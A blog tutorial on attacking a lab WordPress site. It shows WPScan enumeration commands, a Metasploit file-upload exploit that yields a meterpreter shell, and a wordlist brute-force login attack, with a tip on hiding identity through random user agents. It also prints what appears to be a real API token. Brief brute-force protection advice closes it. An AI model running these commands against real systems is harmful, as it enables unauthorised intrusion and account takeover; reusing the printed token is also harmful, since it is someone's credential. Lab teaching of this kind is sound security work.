
Hey folks, in this article we will discussing how we can find vulnerability in any WordPress website by using WPScan tool. Also in the last we will learn how to protect himself from brute force attack
WPScan
Various tools are available for penetration testing on WordPress CMS, but WPScan is specifically designed for penetration testing on WordPress. WPScan is also known as black box WordPress vulnerability scanner because we can use this tool to scan remote WordPress installations to find security issues.
Requirements
Kali Linux ( Tested on 2020.1 ) = Attacker
Ubuntu = WordPress CMS ( Victim)
Lets take a look 🙂 !!
WPScan comes pre-installed in kali linux operating system, Hence you can start this tool by type WPScan in your terminal.
1 | wpscan -h |

Now lets try to grab the version of wordpress by using the following command.
1 | wpscan --url http://192.168.0.105/wordpress |
Here you can see that the upload directory has open on web server and we has successfully received the version of wordpress.

If you want to find about the theme so you can use the following command.
Usage : t = Theme
1 | wpscan --url http://192.168.0.105/wordpress --enumerate t |

You can obtain the details about the plugin which is installed on that web server.
Usage : p = Popular Plugin
1 | wpscan --url http://192.168.0.105/wordpress --enumerate p |

Find Vulnerability
If you want to check the themes are vulnerable or not so you can execute the following command.
Usage : vt = vulnerable themes
1 | wpscan --url http://192.168.0.105/wordpress --enumerate vt |

With help of following command you can find the vulnerable plugins.
Usage : vp = vulnerable plugins
1 | wpscan --url http://192.168.0.105/wordpress --enumerate vp |

Random User Agent feature help us to hide our identity so this is advantage for hackers.
Usage : rua = Random User Agent
1 | wpscan --url http://192.168.0.105/wordpress/ --rua |
Most of the time the normal scan are not able to find the vulnerability in website, Hence to perform advance scan you should have your own API Token. You can get your token from this website.
Now lets try to scan with API Token.
rua = Random User Agent
vt = Vulnerable theme
vp = Vulnerable plugin
–api-token = your API token
1 | wpscan --url http://192.168.0.105/wordpress/ --enumerate --rua --enumerate vp vt --api-token 6Fejr5GPkdaYszG53555553wVisu8tGMBfNYozUl5w |
After completing the scan you can see that we have received vulnerable plugins.


Exploiting
Now we have to check the exploitation of vulnerable plugins to get the direct meterpreter session of the web server.

Now we will exploit of that web server by using the following command.
1 2 3 4 5 6 7 | msfconsole search reflex use exploit/unix/webapp/wp_reflexgallery_file_upload set targeturi wordpress set rhosts 192.168.0.105 check run |

A soon as we execute this payload the meterpreter session will be comes here.

Brute Force Attack
If you want to try brute force attack on web server, so first of all you have to some information about the web server such as username which you can easily obtain with the help of following command.
Usage : u = username
1 | wpscan --url http://192.168.0.105/wordpress/ --enumerate u |

Now we can perform the brute force attack using the following command.
1 | wpscan --url http://192.168.0.105/wordpress -U shubham -P /root/pass.txt |

Avoid Brute Force Attack
If you want to protect your web server from brute force attack then you can install the following plugin and activate it.

Now change some configurations as per your need.

After activate the plugin you can observe brute force attack will be fails due to 2 valid attempts option and after that server will block you.


A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.
One thought on “WordPress Penetration Testing”